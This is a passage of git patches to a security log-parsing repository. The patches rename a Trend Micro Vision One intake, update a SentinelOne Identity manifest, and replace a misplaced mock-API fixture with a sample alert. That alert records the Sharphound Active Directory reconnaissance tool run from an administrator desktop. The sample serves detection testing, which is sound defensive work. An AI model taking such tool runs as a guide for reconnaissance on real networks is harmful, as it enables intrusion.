Micro Vision One [BETA] -slug: trend-micro-vision-one +name: Trend Micro Vision One Workbench Alerts [BETA] +slug: trend-micro-vision-one-workbench-alerts description: >- Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + This intake format will ingest Workbench Alerts from Trend Micro Vision One. data_sources: Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json rename to Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml similarity index 99% rename from Trend Micro/trend-micro-vision-one/ingest/parser.yml rename to Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml index d672e2a64..f5859582b 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml @@ -1,4 +1,4 @@ -name: trend-micro-vision-one +name: trend-micro-vision-one-workbench ignored_values: [] pipeline: - name: parsed_event diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_process.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_project_injection.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_registry.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json similarity index 100% rename from Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json From da65007e11116a5b5a457a097df379c56cd4d66b Mon Sep 17 00:00:00 2001 From: vg-svitla <131353512+vg-svitla@users.noreply.github.com> Date: Mon, 2 Dec 2024 15:24:03 +0200 Subject: [PATCH 115/150] Update SentinelOne/identity/_meta/manifest.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- SentinelOne/identity/_meta/manifest.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml index 1d18ad943..e8b52a2d5 100644 --- a/SentinelOne/identity/_meta/manifest.yml +++ b/SentinelOne/identity/_meta/manifest.yml @@ -1,6 +1,8 @@ uuid: b502e522-6996-4b12-9538-f69326b68243 -name: SentinelOne Singularity Identity +name: SentinelOne Singularity Identity [ALPHA] slug: sentinelone-singularity-identity +automation_connector_uuid: 2d772558-821d-4663-87bd-af28bbb8415a +automation_module_uuid: ff675e74-e5c1-47c8-a571-d207fc297464 description: >- SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. From c97f9cc3ebe0cc7aa224c75fb383f2bbbb3ff18e Mon Sep 17 00:00:00 2001 From: vg-svitla Date: Mon, 2 Dec 2024 17:26:30 +0200 Subject: [PATCH 116/150] Fix comments --- SentinelOne/identity/tests/test_alert_16.json | 47 ------------------- SentinelOne/identity/tests/test_alert_2.json | 31 ++++++++++-- 2 files changed, 28 insertions(+), 50 deletions(-) delete mode 100644 SentinelOne/identity/tests/test_alert_16.json diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json deleted file mode 100644 index 0a9dc292d..000000000 --- a/SentinelOne/identity/tests/test_alert_16.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "input": { - "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" - }, - "expected": { - "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", - "event": { - "category": "intrusion_detection", - "end": "2024-11-22T08:45:50Z", - "kind": "alert", - "provider": "Identity", - "reason": "This events is raised when a LDAP search Query is detected from the endpoint.", - "start": "2024-11-22T08:45:50Z", - "type": "info" - }, - "@timestamp": "2024-11-22T08:45:50Z", - "observer": { - "product": "Singularity Identity", - "vendor": "SentinelOne" - }, - "process": { - "command_line": "Sharphound.exe", - "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe" - }, - "related": { - "hash": [ - "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - ] - }, - "sentinelone": { - "identity": { - "attackSurfaces": [ - "IDENTITY" - ], - "classification": "ENUMERATION", - "confidenceLevel": "MALICIOUS", - "id": "01935310-dc47-75de-8925-5f026bd5a705", - "name": "LDAP Search Detected", - "status": "NEW" - } - } - } -} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json index 39420a5e0..0a9dc292d 100644 --- a/SentinelOne/identity/tests/test_alert_2.json +++ b/SentinelOne/identity/tests/test_alert_2.json @@ -1,21 +1,46 @@ { "input": { - "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": \"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}" + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" }, "expected": { - "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n 